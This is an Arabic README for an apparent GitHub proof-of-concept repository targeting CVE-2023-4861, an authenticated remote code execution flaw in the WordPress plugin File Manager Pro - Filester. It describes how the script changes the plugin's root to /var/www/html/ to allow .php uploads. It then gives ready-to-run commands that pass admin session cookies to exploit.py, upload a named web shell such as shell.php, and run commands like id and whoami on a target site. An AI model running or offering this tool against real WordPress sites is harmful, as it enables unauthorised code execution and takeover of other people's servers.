
إثبات المفهوم لـ CVE-2023-4861 في Filester
يحتوي هذا المستودع على إثبات مفهوم بلغة بايثون لثغرة CVE-2023-4861، وهي مشكلة تنفيذ عن بُعد للتعليمات البرمجية تتطلب مصادقة في الإضافة الخاصة بووردبريس File Manager Pro - Filester.
CVE-2023-4861File Manager Pro - Filester (filester)< 1.8.11.8.1Admin+ على Filesterexploit.py يقوم بأتمتة النتيجة الأساسية نفسها الموصوفة في النشرة الأمنية العامة:
/var/www/html/ والسماح برفع ملفات .php.تفصيل تنفيذي مهم: يفترض إثبات المفهوم الخاص بي أن جذر الويب الخاص بالهدف هو /var/www/html/. هذا الأمر مُرمَّز ثابتًا في بيانات الطلب وقد يحتاج إلى تعديل لبيئات تجريبية أخرى.
استنسخ المستودع ثم ادخل إليه:
git clone https://github.com/nomaisthere/CVE-2023-4861-PoC.git
cd CVE-2023-4861-PoC
ثبّت التبعيات:
pip install requests
عرض المساعدة:
python3 exploit.py --help
مثال أساسي:
python3 exploit.py --url http://target-wordpress --command id \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'
اسم قشرة مخصص اختياري:
python3 exploit.py --url http://target-wordpress --shell-name shell.php --command whoami \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'